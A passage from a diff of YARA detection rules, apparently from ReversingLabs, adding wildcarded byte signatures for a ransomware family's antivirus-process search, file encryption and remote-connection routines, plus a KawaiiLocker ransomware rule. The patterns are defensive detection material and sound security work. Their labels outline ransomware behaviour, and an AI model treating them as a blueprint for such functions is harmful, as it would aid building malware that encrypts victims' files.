+            C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 83 65 ?? ?? 8D 55
+            ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68
+            ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ??
+            ?? ?? 83 65 ?? ?? 83 65 ?? ?? 41 89 45 ?? 8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ??
+            ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ??
+            ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84
+            ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ??
+            ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ?? 83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ??
+            89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ??
+            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75
+            ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85
+            C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86 ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33
+            C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13
+            45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53
+            FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B
+            CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ??
+            FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ?? ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ?? ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF
+            D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75
+            ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01
+            8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ??
+            ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
+        }
+		$remote_connection_v5_0_2 = {
+            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
+            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
+            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
+            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
+            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
+            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 33 C9 41 85 C0 8B 45 ?? 0F 45
+            F9 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2
+        }
+		$crypt_files_v5_0_3 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F9 89 55 ?? 33 DB B9 ?? ?? ?? ?? 89 5D ?? E8
+            ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ??
+            53 53 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 53
+            6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 8D 45 ?? 50 68 ?? ?? ?? ??
+            56 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 81 BE ?? ??
+            ?? ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? FF 70 ?? FF 70 ?? 53 53 57 FF 15 ?? ?? ?? ?? 57 FF
+            15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 53 0F 57 C0 66 0F 13 45 ?? FF
+            75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 89 5D ?? 56 8D 4D ?? E8 ?? ??
+            ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 88 5D ?? 48 75 ?? 51 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 41
+            8B 45 ?? 89 85 ?? ?? ?? ?? 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 8E ?? ?? ?? ?? 83 C1
+            ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 5D ?? 53 8D 45 ?? 50 FF B6 ?? ?? ?? ?? FF 75
+            ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 3B
+            8E ?? ?? ?? ?? 8B 45 ?? 6A ?? 5A 0F 42 C2 39 5D ?? 8B 55 ?? 0F 45 45 ?? 01 8E ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? 89 45 ?? 11 9E ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 50 56 89 45 ??
+            E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 53 52 50 57 FF 15 ?? ?? ?? ?? 8B
+            C3 89 5D ?? 83 F8 ?? 7D ?? 53 8D 45 ?? 50 FF 75 ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 40 89 45 ?? EB ?? 8B 75 ?? 33 C0 8B 4D ?? 40 01
+            86 ?? ?? ?? ?? 11 9E ?? ?? ?? ?? EB ?? 33 C0 8D 48 ?? 89 4D ?? 85 C9 0F 84 ?? ?? ??
+            ?? 39 5D ?? 74 ?? 6A ?? 53 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 57 FF 15 ?? ??
+            ?? ?? 53 8D 45 ?? 50 68 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B D8 E8 ?? ??
+            ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 FF ?? 74 ?? 8B 45 ?? 57 83 08
+            ?? FF 15 ?? ?? ?? ?? 8B C3 5F 5E 5B 8B E5 5D C3
+        }
+		$remote_connection_v5_0_3 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 68 ?? ?? ?? ?? 33 DB 8D 85 ?? ?? ?? ?? 8B F1 53
+            50 89 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B FB 0F B7 04 5E 66 85 C0 74 ?? 83 F8 ?? 75 ??
+            83 C3 ?? 56 89 5D ?? FF 15 ?? ?? ?? ?? 3B D8 73 ?? 8D 14 1B 0F B7 04 32 EB ?? 66 83
+            F8 ?? 74 ?? 43 0F B7 04 5E 66 85 C0 75 ?? EB ?? 8B CB 2B 4D ?? 74 ?? 03 F2 8D BD ??
+            ?? ?? ?? D1 E9 F3 A5 13 C9 66 F3 A5 8B 75 ?? 8D 43 ?? 8D 04 46 50 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 33 FF 47 43 85 FF 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ??
+            ?? 8D 7D ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85
+            FF 74 ?? 51 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 83 EC ?? 57 FF 15 ?? ?? ??
+            ?? 50 57 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B CF 8B
+            F0 E8 ?? ?? ?? ?? EB ?? 33 F6 83 7D ?? ?? 74 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 8B C6
+            5E 5B 8B E5 5D C3
+        }
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( ( $search_antivirus_processes and $find_files and $crypt_files and $remote_connection ) or ( $find_files_v2 and $crypt_files_v2 and $search_antivirus_processes_v2 and $remote_connection_v2 ) or ( $search_antivirus_processes_v2 and $find_files_v2_1 and $crypt_files_v2_1 and $remote_connection_v2_1 ) or ( $search_antivirus_processes_v4_1_2 and $find_files_v4_1_2 and $crypt_files_v4_1_2 and $remote_connection_v4_1_2 and $url_parameters_setup_v4_1_2 ) or ( $search_antivirus_processes_v4 and $find_files_v4 and $crypt_files_v4 and $url_parameters_setup_v4 ) or ( $search_antivirus_processes_v2 and $find_files_v2_1 and $remote_connection_v2_1 and $crypt_files_v3 ) or ( $search_antivirus_processes_v5 and $find_files_v5 and $crypt_files_v5 and $remote_connection_v5 and $url_parameters_setup_v5 ) or ( $search_antivirus_processes_v5_0_1 and $find_files_v5_0_1 and $crypt_files_v5_0_1 and $url_parameters_setup_v5_0_1 and $remote_connection_v5_0_1 ) or ( $search_antivirus_processes_v5_0_2 and $find_files_v5_0_2 and $crypt_files_v5_0_2 and $set_url_parameters_v5_0_2 and $remote_connection_v5_0_2 ) or ( $search_antivirus_processes_v5_0_2 and $find_files_v5_0_2 and $crypt_files_v5_0_3 and $set_url_parameters_v5_0_3 and $remote_connection_v5_0_3 ) )
+}
+rule REVERSINGLABS_Win32_Ransomware_Kawaiilocker : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects KawaiiLocker ransomware."
 		author = "ReversingLabs"
-		id = "b7439b38-c8b7-5dcb-8d10-952862ce3465"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "8c368e2d-3c6f-5c4b-880b-ebdb06dcf901"
+		date = "2020-08-17"
+		modified = "2020-08-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2230-L2246"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a879ecd957acd29e8a5bad6c97cd10453ab857949680b522735bd77eb561d2ee"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.KawaiiLocker.yara#L1-L135"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d86b41ef1c43da55869ad26facd5efdf232277f0e33483690a69a04c4ba8f7da"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "KawaiiLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files = {
+            55 8B EC 51 B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 87 4D ?? 53 56 57 88 4D ?? 89 55
+            ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8
+            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80 7D ?? ?? 0F 85 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8A 4D
+            ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BB ?? ?? ?? ?? FF 75 ?? 68
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 13 E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D
+            95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ??
+            FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 83 C3 ?? 4E 0F 85 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8B C7 83 C8 ?? 3B C7 75 ?? 80 7D ?? ?? 0F 85 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8A 4D
+            ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BB ?? ?? ?? ?? FF 75 ?? 68
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 13 E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D
+            95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ??
+            FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 83 C3 ?? 4E 0F 85 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? C3
+        }
+		$remote_connection = {
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2
+            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            45 ?? 50 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 59 E8 ?? ?? ?? ??
+            8D 4D ?? BA ?? ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75
+            ?? 8D 4D ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 8D 45 ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45
+            ?? 8B 50 ?? 8B 45 ?? 8B 08 FF 51 ?? 8D 55 ?? 8B 45 ?? 8B 08 FF 51 ?? 8B 45 ?? 8D 55
+            ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? E8 ?? ??
+            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B C3 8B 55 ?? E8 ?? ?? ?? ??
+            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$encrypt_files = {
+            55 8B EC 6A ?? 6A ?? 6A ?? 53 56 57 BB ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30
+            64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52
+            ?? 8B F0 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43
+            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B DE 4B 85 DB 7C ?? 43 33 F6 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45
+            ?? 8D 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ??
